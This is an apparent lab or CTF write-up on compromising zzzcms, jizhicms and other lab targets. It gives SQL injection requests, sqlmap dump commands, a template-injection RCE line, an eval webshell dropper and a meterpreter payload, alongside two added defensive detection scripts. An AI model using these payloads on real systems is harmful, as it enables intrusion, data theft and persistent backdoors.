On the first day, when I started the lab environment, for some reason there was nothing there after it came up. I went straight to scanning the ports of the assigned IP, found two, and tried the usual three tricks on them with no result.

On the second day I started the environment again, and this time there was a CMS. Good grief, so yesterday's two hours of scanning had been aimed at the wrong target.

We start off with a zzzcms.

I started searching for historical zzzcms vulnerabilities. I read a few articles and found them rather messy; it was unclear which ones would work. I decided to try the simple ones first.

First, of course, weak passwords. I tried a few with no luck, then found an article:

https://www.cnblogs.com/0daybug/p/12565986.html

config.php disclosure: /admin/?module=templateedit&type=/config/zzz_config.php

It contains the database account and password.

I tried connecting with it, but it didn't work: there is a restriction, and my IP isn't allowed. I also tried it here as the admin password, and it isn't. So I had to change approach.

Then I saw another article by an expert, https://www.laitimes.com/article/2t711_38slf.html, saying there is an injection, so I tried it right away.

```http
GET /search/ HTTP/1.1
Host: 172.50.12.33
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=5ij67devm1pd3ssb93g4um3fs4; zzz_adminpass=1;zzz_keys=0*
Connection: close
```

Try it in Burp.

The response time is twice the delay that was set.

Run it straight through sqlmap: python3 .\sqlmap.py -r C:\Users\xin\Desktop\gggggg.txt --risk 3 --level 3 -D zzzcms -T zzz_user --dump

admin,84c45962d887564f

For a hash like this, just look it up on Baidu.

admin,admin123456

At this point we can log in. I believe everyone has read articles saying the admin directory is admin plus three characters; in this target environment it isn't, it's just admin. http://172.50.12.33/plugins/webuploader/js/webconfig.php

As you can see here, I even ran a full round of directory scanning for it and didn't find it.

Next comes the admin backend.

Following this article, we perform the backend RCE:

https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/Zzzcms/Zzzcms%201.61%20%E5%90%8E%E5%8F%B0%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/

After logging in, click Template Management at the top, then Local Templates, find the PC template, open search.html, and append one line at the end.

{if:assert($_request[phpinfo()])}phpinfo();eva1($_POST['a']);{end if}

http://172.50.12.33/search/ is actually http://172.50.12.33/search/index.php

{if:assert($_POST[x])}phpinfo();{end if}

With that, the connection is established.
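Because this RCE is persisted in a template file rather than carried in a request, the defensive counterpart is a hunt through the template tree for `{if:...}` directives that hand a code-execution function or a request superglobal to the template engine. The following is an added example written for this post, not zzzcms code: the sample templates are constructed, and `audit_template`, `audit_templates` and `audit_directory` are my own names.

```python
import os
import re
from typing import Dict, List, Tuple

# Constructed sample templates (not files from the original post). One is clean;
# the other carries the kind of {if:...} directive appended to search.html above.
SAMPLE_TEMPLATES: Dict[str, str] = {
    "template/pc/default/index.html": (
        "<div>{zzz:title}</div>\n{if:$page>1}<a>next</a>{end if}\n"
    ),
    "template/pc/default/search.html": (
        "<ul>{loop:results}<li>{result:title}</li>{end loop}</ul>\n"
        "{if:assert($_request[phpinfo()])}phpinfo();eva1($_POST['a']);{end if}\n"
    ),
}

# A zzzcms {if:<expr>} ... {end if} directive evaluates <expr> as PHP, so the
# condition text is what gets inspected.
IF_DIRECTIVE = re.compile(r"\{if:(.*?)\}", re.IGNORECASE | re.DOTALL)

# Functions that execute arbitrary code, and superglobals that carry request data.
# Either one inside an {if:} condition has no business in a page template.
DANGEROUS_CALLS = re.compile(
    r"\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|"
    r"create_function|call_user_func(?:_array)?|preg_replace)\s*\(",
    re.IGNORECASE,
)
REQUEST_SUPERGLOBALS = re.compile(
    r"\$_(?:request|post|get|cookie|files)\b", re.IGNORECASE
)


def audit_template(path: str, content: str) -> List[Tuple[str, int, str]]:
    """Return (path, line_number, reason) for each suspicious {if:} directive."""
    findings: List[Tuple[str, int, str]] = []
    for m in IF_DIRECTIVE.finditer(content):
        cond = m.group(1)
        line_no = content.count("\n", 0, m.start()) + 1
        reasons = []
        if DANGEROUS_CALLS.search(cond):
            reasons.append("code-execution function in {if:} condition")
        if REQUEST_SUPERGLOBALS.search(cond):
            reasons.append("request superglobal in {if:} condition")
        if reasons:
            findings.append((path, line_no, "; ".join(reasons)))
    return findings


def audit_templates(templates: Dict[str, str]) -> List[Tuple[str, int, str]]:
    """Audit an in-memory {path: content} map (used for the constructed samples)."""
    findings: List[Tuple[str, int, str]] = []
    for path, content in templates.items():
        findings.extend(audit_template(path, content))
    return findings


def audit_directory(root: str) -> List[Tuple[str, int, str]]:
    """Walk a real template directory and audit every .html/.htm file in it."""
    findings: List[Tuple[str, int, str]] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".html", ".htm")):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    findings.extend(audit_template(full, fh.read()))
    return findings


if __name__ == "__main__":
    for path, line_no, reason in audit_templates(SAMPLE_TEMPLATES):
        print(f"{path}:{line_no}: {reason}")
```

Keying on the superglobal as well as the function name means a directive still gets flagged when the function name in the body is disguised or misspelled; the condition is what the engine evaluates, and that is where the superglobal has to appear. Point `audit_directory` at the CMS template root to check a live install.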

gears

python3 .\sqlmap.py -u "http://172.10.59.35/moduleinterface.php?mact=News,m_,default,0&m_idlist=a,b,c,1,2,3))*" --batch --level 5 --risk 3

pt-1

http://10.0.0.68/cslab/admin_notify.php

cslab cslab

notify1=1";eval($_POST[a]);phpinfo();highlight_file(__FILE__);//&notify2=2&notify3=3

a=system('echo ^<?php @eval($_POST[cmd]);?^> > ./shell.txt');

a=copy('shell.txt','a.php');

windows/x64/meterpreter/bind_tcp

```http
POST /message/index.html HTTP/1.1
Host: 192.168.111.200
Content-Length: 45
Cache-Control: max-age=0
Origin: http://192.168.111.200
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.111.200/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=r1ttlpnb1h9aib0fnd8raq3fgj
cdn-src-ip: 2' and extractvalue(0x0a,concat(0x0a,(select user()))) and '1
Connection: close

tid=1&user=1&title=1&tel=13011111111&body=123
```


```http
cdn-src-ip: 2' and extractvalue(0x0a,concat(0x0a,(select group_concat(schema_name) from information_schema.schemata))) and '1
```

information_schema,jizhicms,jiz
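All three of the request-level findings in this writeup travel outside the ordinary form parameters: the zzzcms injection rides in the `zzz_keys` cookie, the jizhicms one in the `cdn-src-ip` header, and the config disclosure in the template editor's `type` query parameter. A WAF rule or log-review script that only inspects the query string misses every one of them. The following added example (not code from the original post or from either CMS) parses a raw HTTP/1.1 request into every attacker-controllable field and flags the markers used above; the sample requests are constructed with placeholder hosts and session ids, and `parse_request` and `inspect_request` are my own names.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qsl, urlsplit

# Constructed sample requests modelled on the ones in this writeup; they are not
# the captures from the post. Hosts and session ids are placeholders.
SQLI_IN_HEADER = (
    "POST /message/index.html HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: PHPSESSID=placeholder\r\n"
    "cdn-src-ip: 2' and extractvalue(0x0a,concat(0x0a,(select user()))) and '1\r\n"
    "\r\n"
    "tid=1&user=1&title=1&tel=13011111111&body=123"
)
CONFIG_READ = (
    "GET /admin/?module=templateedit&type=/config/zzz_config.php HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\n"
    "Cookie: PHPSESSID=placeholder\r\n"
    "\r\n"
)
BENIGN = (
    "GET /search/?keys=laptop HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\n"
    "Cookie: PHPSESSID=placeholder; zzz_keys=laptop\r\n"
    "\r\n"
)

# Markers for the techniques seen in the writeup: MySQL error-based and
# time-based functions, schema enumeration, quote-breakout boolean logic,
# and PHP code smuggled into a parameter.
SQLI = re.compile(
    r"\b(extractvalue|updatexml|sleep|benchmark)\s*\(|information_schema|"
    r"\bunion\b.+\bselect\b|'\s*(and|or)\s+",
    re.IGNORECASE,
)
PHP_CODE = re.compile(
    r"<\?php|\b(eval|assert|system)\s*\(|\$_(post|get|request)\b", re.IGNORECASE
)
# The template editor should only ever be handed a template path; anything that
# climbs out of the template tree or points at a .php config file is abuse.
SENSITIVE_PATH = re.compile(r"\.\./|/config/|\.php$", re.IGNORECASE)


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP/1.1 request into method, path and a flat map of every
    attacker-controllable field: query, body, cookie and header values."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    fields: Dict[str, str] = {}
    for k, v in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        fields[f"query:{k}"] = v
    for k, v in parse_qsl(body, keep_blank_values=True):
        fields[f"body:{k}"] = v
    for part in headers.get("cookie", "").split(";"):
        k, _, v = part.strip().partition("=")
        if k:
            fields[f"cookie:{k}"] = v
    for name, value in headers.items():
        if name != "cookie":
            fields[f"header:{name}"] = value
    return method, urlsplit(target).path, fields


def inspect_request(raw: str) -> List[Tuple[str, str]]:
    """Return (field, reason) pairs for every field carrying an injection marker.
    Every field is checked, because the payloads above travelled in a Cookie
    and in a custom header, not in the usual form parameters."""
    _method, _path, fields = parse_request(raw)
    findings: List[Tuple[str, str]] = []
    for where, value in fields.items():
        if SQLI.search(value):
            findings.append((where, "sql injection marker"))
        if PHP_CODE.search(value):
            findings.append((where, "php code in parameter"))
        if (
            where == "query:type"
            and fields.get("query:module") == "templateedit"
            and SENSITIVE_PATH.search(value)
        ):
            findings.append((where, "template editor pointed at a config file"))
    return findings


if __name__ == "__main__":
    samples = (("benign", BENIGN), ("header sqli", SQLI_IN_HEADER), ("config read", CONFIG_READ))
    for name, raw in samples:
        print(name, inspect_request(raw))
```

The time-based variant used against zzzcms leaves the same `sleep(` marker in the cookie that `SQLI` matches here; the one thing a pattern check cannot see is the timing itself, so pair this with an alert on requests to `/search/` whose response time clusters at a fixed multiple of a few seconds.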